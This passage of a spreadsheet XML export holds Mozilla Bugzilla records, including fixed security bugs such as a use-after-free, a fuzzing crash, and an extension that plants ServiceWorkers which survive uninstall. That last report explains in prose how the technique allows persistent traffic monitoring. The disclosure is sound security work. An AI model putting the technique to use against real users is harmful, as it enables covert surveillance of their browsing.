      </c>
      <c r="P774" t="inlineStr"/>
      <c r="Q774" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R774" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S774" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="T774" t="n">
        <v>1</v>
      </c>
      <c r="U774" t="n">
        <v>0</v>
      </c>
      <c r="V774" t="n">
        <v>11</v>
      </c>
      <c r="W774" t="inlineStr">
        <is>
          <t>Using 1/14 build on Win 98.
Open the URL.
Expected: Background should render.
Actual: Background does not render.</t>
        </is>
      </c>
      <c r="X774" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="775">
      <c r="A775" t="n">
        <v>869210</v>
      </c>
      <c r="B775" t="inlineStr">
        <is>
          <t>2013-05-06 15:26:09 -0700</t>
        </is>
      </c>
      <c r="C775" t="inlineStr">
        <is>
          <t>Clean up make build output</t>
        </is>
      </c>
      <c r="D775" t="inlineStr">
        <is>
          <t>2013-06-17 09:02:56 -0700</t>
        </is>
      </c>
      <c r="E775" t="n">
        <v>1</v>
      </c>
      <c r="F775" t="n">
        <v>1</v>
      </c>
      <c r="G775" t="n">
        <v>5</v>
      </c>
      <c r="H775" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I775" t="inlineStr">
        <is>
          <t>L20n</t>
        </is>
      </c>
      <c r="J775" t="inlineStr">
        <is>
          <t>JS Library</t>
        </is>
      </c>
      <c r="K775" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L775" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M775" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N775" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P775" t="inlineStr"/>
      <c r="Q775" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R775" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S775" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T775" t="n">
        <v>1</v>
      </c>
      <c r="U775" t="n">
        <v>0</v>
      </c>
      <c r="V775" t="n">
        <v>8</v>
      </c>
      <c r="W775" t="inlineStr">
        <is>
          <t>make build output currently is very scary to any newcomer and super noisy for us.
http://pastebin.mozilla.org/2380325</t>
        </is>
      </c>
      <c r="X775" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="776">
      <c r="A776" t="n">
        <v>1432743</v>
      </c>
      <c r="B776" t="inlineStr">
        <is>
          <t>2018-01-24 02:14:58 -0800</t>
        </is>
      </c>
      <c r="C776" t="inlineStr">
        <is>
          <t>Move cookie settings to the Site Data section</t>
        </is>
      </c>
      <c r="D776" t="inlineStr">
        <is>
          <t>2023-12-18 16:11:58 -0800</t>
        </is>
      </c>
      <c r="E776" t="n">
        <v>1</v>
      </c>
      <c r="F776" t="n">
        <v>1</v>
      </c>
      <c r="G776" t="n">
        <v>2</v>
      </c>
      <c r="H776" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I776" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J776" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K776" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N776" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P776" t="inlineStr">
        <is>
          <t>[storage-v2]</t>
        </is>
      </c>
      <c r="Q776" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R776" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S776" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T776" t="n">
        <v>1</v>
      </c>
      <c r="U776" t="n">
        <v>0</v>
      </c>
      <c r="V776" t="n">
        <v>15</v>
      </c>
      <c r="W776" t="inlineStr">
        <is>
          <t>As per our UI concept in bug 1421690 and (finally) following the spec guidelines (https://www.w3.org/TR/webstorage/#privacy) we'd like to merge the cookies settings into the "Site Data" section and move them to top-level.
This also means removing individual cookie management from about:preferences.</t>
        </is>
      </c>
      <c r="X776" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="777">
      <c r="A777" t="n">
        <v>1636629</v>
      </c>
      <c r="B777" t="inlineStr">
        <is>
          <t>2020-05-08 17:20:55 -0700</t>
        </is>
      </c>
      <c r="C777" t="inlineStr">
        <is>
          <t>Extensions can Inject ServiceWorkers which persist after uninstall</t>
        </is>
      </c>
      <c r="D777" t="inlineStr">
        <is>
          <t>2023-04-03 11:11:57 -0700</t>
        </is>
      </c>
      <c r="E777" t="n">
        <v>1</v>
      </c>
      <c r="F777" t="n">
        <v>1</v>
      </c>
      <c r="G777" t="n">
        <v>3</v>
      </c>
      <c r="H777" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I777" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J777" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K777" t="inlineStr">
        <is>
          <t>76 Branch</t>
        </is>
      </c>
      <c r="L777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N777" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P777" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main95+]</t>
        </is>
      </c>
      <c r="Q777" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R777" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S777" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T777" t="n">
        <v>1</v>
      </c>
      <c r="U777" t="n">
        <v>0</v>
      </c>
      <c r="V777" t="n">
        <v>37</v>
      </c>
      <c r="W777" t="inlineStr">
        <is>
          <t>Created attachment 9146967
background.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Steps to reproduce:
Side-load the attached extension and observe that a tab appears loading the URL "https://example.com". Then, navigate to "about:debugging" and notice a ServiceWorker has been installed on the example.com domain with the URL "https://example.com/?injected-sw=1". Remove the side-loaded extension and notice the ServiceWorker is not unloaded.
Actual results:
An extension installed a ServiceWorker into the domain of a page.
Expected results:
This may be by design, but I don't think extensions should be able to inject ServiceWorkers into pages. This would allow extension developers to monitor all HTTP traffic from that domain and would give them persistent access to this monitoring capability even if the extension is uninstalled. Since the ServiceWorker can be installed with any random query parameter, as demonstrated in the code, this is also extremely difficult for the true owners of the domain to remove the ServiceWorker from the user's browser. User's will likely need to remove the ServiceWorker manually. 
It should also be noted that these ServiceWorkers will always be around. Due to how they are installed through header and body manipulations, when the ServiceWorker attempts to update, the content-type will not match the "application/javascript" that is expected when the extension is no longer installed. This will cause the browser to fall back to the original ServiceWorker code.</t>
        </is>
      </c>
      <c r="X777" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="778">
      <c r="A778" t="n">
        <v>333381</v>
      </c>
      <c r="B778" t="inlineStr">
        <is>
          <t>2006-04-09 16:59:16 -0700</t>
        </is>
      </c>
      <c r="C778" t="inlineStr">
        <is>
          <t>Scale back upload interval while idle</t>
        </is>
      </c>
      <c r="D778" t="inlineStr">
        <is>
          <t>2010-12-07 00:57:45 -0800</t>
        </is>
      </c>
      <c r="E778" t="n">
        <v>1</v>
      </c>
      <c r="F778" t="n">
        <v>1</v>
      </c>
      <c r="G778" t="n">
        <v>6</v>
      </c>
      <c r="H778" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I778" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J778" t="inlineStr">
        <is>
          <t>Data Collection/Metrics</t>
        </is>
      </c>
      <c r="K778" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N778" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P778" t="inlineStr"/>
      <c r="Q778" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R778" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S778" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T778" t="n">
        <v>1</v>
      </c>
      <c r="U778" t="n">
        <v>0</v>
      </c>
      <c r="V778" t="n">
        <v>3</v>
      </c>
      <c r="W778" t="inlineStr">
        <is>
          <t>If there are no events in the log, we should suppress uploading, up to a maximum ping time (24 hours).</t>
        </is>
      </c>
      <c r="X778" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="779">
      <c r="A779" t="n">
        <v>1288780</v>
      </c>
      <c r="B779" t="inlineStr">
        <is>
          <t>2016-07-22 09:59:41 -0700</t>
        </is>
      </c>
      <c r="C779" t="inlineStr">
        <is>
          <t>Possible crash if object containing GCPtr destroyed after failed initialisation</t>
        </is>
      </c>
      <c r="D779" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:09 -0800</t>
        </is>
      </c>
      <c r="E779" t="n">
        <v>1</v>
      </c>
      <c r="F779" t="n">
        <v>1</v>
      </c>
      <c r="G779" t="n">
        <v>3</v>
      </c>
      <c r="H779" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I779" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J779" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K779" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L779" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M779" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N779" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P779" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q779" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R779" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S779" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T779" t="n">
        <v>1</v>
      </c>
      <c r="U779" t="n">
        <v>0</v>
      </c>
      <c r="V779" t="n">
        <v>20</v>
      </c>
      <c r="W779" t="inlineStr">
        <is>
          <t>The GCPtr destructor contains this assertion as to when it's safe to destroy one of these things:
        // No prebarrier necessary as this only happens when we are sweeping or
        // before the containing object becomes part of the GC graph.
        MOZ_ASSERT(CurrentThreadIsGCSweeping() || CurrentThreadIsHandlingInitFailure());
This doesn't take account of the fact that a post-barrier may have put a pointer to this GCPtr into the storebuffer.  If we do a minor GC in this state we'll attempt to mark whatever garbage ends up at this location.
This only happens when an object containing a GCPtr is destroyed due to initialization failure (otherwise they are destroyed during sweeping which is fine).  
We already have AutoInitGCManagedObject that is supposed to take care of issues like this for us.  A possible fix is to make that put the object on a queue whose contents are destroyed after the next minor GC.  Also, we need jsapi-tests for this.</t>
        </is>
      </c>
      <c r="X779" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="780">
      <c r="A780" t="n">
        <v>1183636</v>
      </c>
      <c r="B780" t="inlineStr">
        <is>
          <t>2015-07-14 06:49:28 -0700</t>
        </is>
      </c>
      <c r="C780" t="inlineStr">
        <is>
          <t>Implement the refreshed design for the panel footer</t>
        </is>
      </c>
      <c r="D780" t="inlineStr">
        <is>
          <t>2015-09-10 02:23:32 -0700</t>
        </is>
      </c>
      <c r="E780" t="n">
        <v>1</v>
      </c>
      <c r="F780" t="n">
        <v>1</v>
      </c>
      <c r="G780" t="n">
        <v>6</v>
      </c>
      <c r="H780" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I780" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J780" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K780" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L780" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M780" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N780" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P780" t="inlineStr">
        <is>
          <t>[visual refresh]</t>
        </is>
      </c>
      <c r="Q780" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R780" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S780" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T780" t="n">
        <v>1</v>
      </c>
      <c r="U780" t="n">
        <v>0</v>
      </c>
      <c r="V780" t="n">
        <v>33</v>
      </c>
      <c r="W780" t="inlineStr">
        <is>
          <t>As the acceptance criteria in bug 1179193 states:
 - Tab footer refresh
For the visual design spec, please check out the ones attached to bug 1179193.</t>
        </is>
      </c>
      <c r="X780" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="781">
      <c r="A781" t="n">
        <v>886754</v>
      </c>
      <c r="B781" t="inlineStr">
        <is>
          <t>2013-06-25 03:58:33 -0700</t>
        </is>
      </c>
      <c r="C781" t="inlineStr">
        <is>
          <t>[Contacts] No Search Highlight Apparent in Contact Search</t>
        </is>
      </c>
      <c r="D781" t="inlineStr">
        <is>
          <t>2015-03-17 01:26:46 -0700</t>
        </is>
      </c>
      <c r="E781" t="n">
        <v>1</v>
      </c>
      <c r="F781" t="n">
        <v>1</v>
      </c>
      <c r="G781" t="n">
        <v>6</v>
      </c>
      <c r="H781" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I781" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J781" t="inlineStr">
        <is>
          <t>Gaia::Contacts</t>
        </is>
      </c>
      <c r="K781" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M781" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N781" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P781" t="inlineStr">
        <is>
          <t>visual design, visual-tracking, bokken, [systemsfe], [priority]</t>
        </is>
      </c>
      <c r="Q781" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R781" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S781" t="inlineStr">
        <is>
          <t>2.0 S1 (9may)</t>
        </is>
      </c>
      <c r="T781" t="n">
        <v>1</v>
      </c>
      <c r="U781" t="n">
        <v>0</v>
      </c>
      <c r="V781" t="n">
        <v>33</v>
      </c>
      <c r="W781" t="inlineStr">
        <is>
          <t>Created attachment 767128
Highlight Search - Contacts
Pavel,
Can you please add search highlights for contact search?
This should function similarly to Email search.
The highlight should be:
#b2f2ff 100% Opacity
Thanks!</t>
        </is>
      </c>
      <c r="X781" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="782">
      <c r="A782" t="n">
        <v>1164766</v>
      </c>
      <c r="B782" t="inlineStr">
        <is>
          <t>2015-05-13 23:27:39 -0700</t>
        </is>
      </c>
      <c r="C782" t="inlineStr">
        <is>
          <t>use-after-free (&amp; crash) after style flush in CanvasRenderingContext2D (which causes destruction of nsIPresShell)</t>
        </is>
      </c>
      <c r="D782" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:10 -0700</t>
        </is>
      </c>
      <c r="E782" t="n">
        <v>1</v>
      </c>
      <c r="F782" t="n">
        <v>1</v>
      </c>
      <c r="G782" t="n">
        <v>3</v>
      </c>
      <c r="H782" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I782" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J782" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K782" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N782" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O782" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P782" t="inlineStr">
        <is>
          <t>[QA: when verifying fix, please test all testcases on duplicate bug 1175278] ZDI will disclose October 2015 (Firefox 41)[b2g-adv-main2.5+]</t>
        </is>
      </c>
      <c r="Q782" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S782" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T782" t="n">
        <v>1</v>
      </c>
      <c r="U782" t="n">
        <v>0</v>
      </c>
      <c r="V782" t="n">
        <v>91</v>
      </c>
      <c r="W782" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150511103303
Steps to reproduce:
Open http://www.opendecagnes.com/programme-et-resultats/les-tableaux.html
Actual results:
crash. Crash report:
https://crash-stats.mozilla.com/report/index/63aeedaf-f62e-4cc9-abdb-9c06c2150514
Expected results:
display the document</t>
        </is>
      </c>
      <c r="X782" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="783">
      <c r="A783" t="n">
        <v>664930</v>
      </c>
      <c r="B783" t="inlineStr">
        <is>
          <t>2011-06-16 23:27:12 -0700</t>
        </is>
      </c>
      <c r="C783" t="inlineStr">
        <is>
          <t>Crash [@ _cairo_bentley_ottmann_tessellate_rectangular]</t>
        </is>
      </c>
      <c r="D783" t="inlineStr">
        <is>
          <t>2012-01-19 10:46:33 -0800</t>
        </is>
      </c>
      <c r="E783" t="n">
        <v>1</v>
      </c>
      <c r="F783" t="n">
        <v>1</v>
      </c>
      <c r="G783" t="n">
        <v>3</v>
      </c>
      <c r="H783" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I783" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J783" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K783" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L783" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M783" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N783" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P783" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q783" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R783" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S783" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T783" t="n">
        <v>1</v>
      </c>
      <c r="U783" t="n">
        <v>0</v>
      </c>
      <c r="V783" t="n">
        <v>26</v>
      </c>
      <c r="W783" t="inlineStr">
        <is>
          <t>Created attachment 539998
testcase (crashes Firefox when loaded)
Possibly a regression from the recent cairo update?
http://hg.mozilla.org/mozilla-central/pushloghtml?changeset=102be3d1f103</t>
        </is>
      </c>
      <c r="X783" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="784">
      <c r="A784" t="n">
        <v>914060</v>
      </c>
      <c r="B784" t="inlineStr">
        <is>
          <t>2013-09-09 02:03:17 -0700</t>
        </is>
      </c>
      <c r="C784" t="inlineStr">
        <is>
          <t>[B2G][Helix][message][zhaotao]wired combination algorithm when handling sending sms to different phone numbers:phonebook digits match not work</t>
        </is>
      </c>
      <c r="D784" t="inlineStr">
        <is>
          <t>2015-03-31 14:58:26 -0700</t>
        </is>
      </c>
      <c r="E784" t="n">
        <v>1</v>
      </c>
      <c r="F784" t="n">
        <v>1</v>
      </c>
      <c r="G784" t="n">
        <v>6</v>
      </c>
      <c r="H784" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I784" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J784" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K784" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N784" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P784" t="inlineStr">
        <is>
          <t>[FT:RIL]</t>
        </is>
      </c>
      <c r="Q784" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R784" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S784" t="inlineStr">
        <is>
          <t>1.2 C4(Nov8)</t>
        </is>
      </c>
      <c r="T784" t="n">
        <v>0</v>
      </c>
      <c r="U784" t="n">
        <v>0</v>
      </c>
      <c r="V784" t="n">
        <v>39</v>
      </c>
      <c r="W784" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; aff-kingsoft-ciba; Zune 4.7)
Steps to reproduce:
【Detail Description*】：wired combination algorithm when handling sending sms to different phone numbers:phonebook digits match not work
【Repro Steps*】：
1、use a chinese sim card,and boot the phone(by the way,i have customized the phonebook digits to 9)
2、open contact,and create a new contact,named AAAA,with phone number:123456789
3、open message,send sms to 123456789,
4、open message,send sms to 23456789
Actual results:
【Real Result*】：
3.send sms to 123456789 match to AAAA,and a new message thread is created
4.send sms to 23456789 match to AAAA too,the message merged with previous sms.
This handling is totally wrong,because i have customized the phonebook digits  match to 9,23456789 should not match 123456789,a new message thread should be created.
By the way,in dialer app,phonebook digits match works fine,when call 123456789,AAAA will be matched,when call 23456789,AAAA will not be matched.
【Test Count*】：5
【Found Count*】：5
【Gaia commit ID*】:c0ea0a4943dc8d3751b07f5b5c5d3abe06364a14 
【Gecko commit ID*】:170f9e477571127cd40997fa2abe262ed43f0e4d
Expected results:
【Expect Result*】：
3.send sms to 123456789 should match to AAAA,and a new message thread should be created
4.send sms to 23456789 should not match to AAAA,and a new message thread should be created</t>
        </is>
      </c>
      <c r="X784" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="785">
      <c r="A785" t="n">
        <v>82195</v>
      </c>
      <c r="B785" t="inlineStr">
        <is>
          <t>2001-05-22 12:51:46 -0700</t>
        </is>
      </c>
      <c r="C785" t="inlineStr">
        <is>
          <t>crash in nsMsgDatabase::CleanupCache</t>
        </is>
      </c>
      <c r="D785" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:21 -0700</t>
        </is>
      </c>
      <c r="E785" t="n">
        <v>1</v>
      </c>
      <c r="F785" t="n">
        <v>1</v>
      </c>
      <c r="G785" t="n">
        <v>3</v>
      </c>
      <c r="H785" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I785" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J785" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K785" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L785" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M785" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N785" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P785" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q785" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R785" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S785" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T785" t="n">
        <v>1</v>
      </c>
      <c r="U785" t="n">
        <v>0</v>
      </c>
      <c r="V785" t="n">
        <v>11</v>
      </c>
      <c r="W785" t="inlineStr">
        <is>
          <t>With my Mac debug mozilla build from today, I crashed when I was quitting (having 
only a mail 3 pane window open (if that is relevant)).  I had read some e-mail, 
deleted some messages, started to send a message and then canceled it.  On Quit, 
I crashed here:
  nsCOMPtr_base::~nsCOMPtr_base()
  nsMsgDatabase::CleanupCache()+000A0
  nsMsgDBModule::Shutdown()+00024
  nsMsgDBModule::~nsMsgDBModule()+0002C
  nsMsgDBMOdule::Release()
  nsDll::Shutdown()
  nsFreeLibrary
  nsFreeLibraryEnum
  ...
other possibly relevant info:  IMAP, move to trash, nsmail-2</t>
        </is>
      </c>
      <c r="X785" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="786">
      <c r="A786" t="n">
        <v>1618325</v>
      </c>
      <c r="B786" t="inlineStr">
        <is>
          <t>2020-02-26 11:44:52 -0800</t>
        </is>
      </c>
      <c r="C786" t="inlineStr">
        <is>
          <t>Non-ASAN crash and AddressSanitizer: SEGV /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:134 in memcpy</t>
        </is>
      </c>
      <c r="D786" t="inlineStr">
        <is>
          <t>2020-03-06 06:35:38 -0800</t>
        </is>
      </c>
      <c r="E786" t="n">
        <v>1</v>
      </c>
      <c r="F786" t="n">
        <v>1</v>
      </c>
      <c r="G786" t="n">
        <v>3</v>
      </c>
      <c r="H786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I786" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J786" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K786" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L786" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M786" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N786" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P786" t="inlineStr">
        <is>
          <t>[jsbugmon:confirmed][fuzzblocker]</t>
        </is>
      </c>
      <c r="Q786" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R786" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S786" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T786" t="n">
        <v>1</v>
      </c>
      <c r="U786" t="n">
        <v>0</v>
      </c>
      <c r="V786" t="n">
        <v>12</v>
      </c>
      <c r="W786" t="inlineStr">
        <is>
          <t>Created attachment 9129263
testcase.html
Testcase found while fuzzing mozilla-central rev 7f41334e1044 (built with --enable-address-sanitizer).
```
==3340==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000244 (pc 0x7fb4681e1477 bp 0x7ffeeaa463d0 sp 0x7ffeeaa45b88 T0)
==3340==The signal is caused by a READ memory access.
==3340==Hint: address points to the zero page.
    #0 0x7fb4681e1476 in memcpy /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:134
    #1 0x563326d8b257 in __asan_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
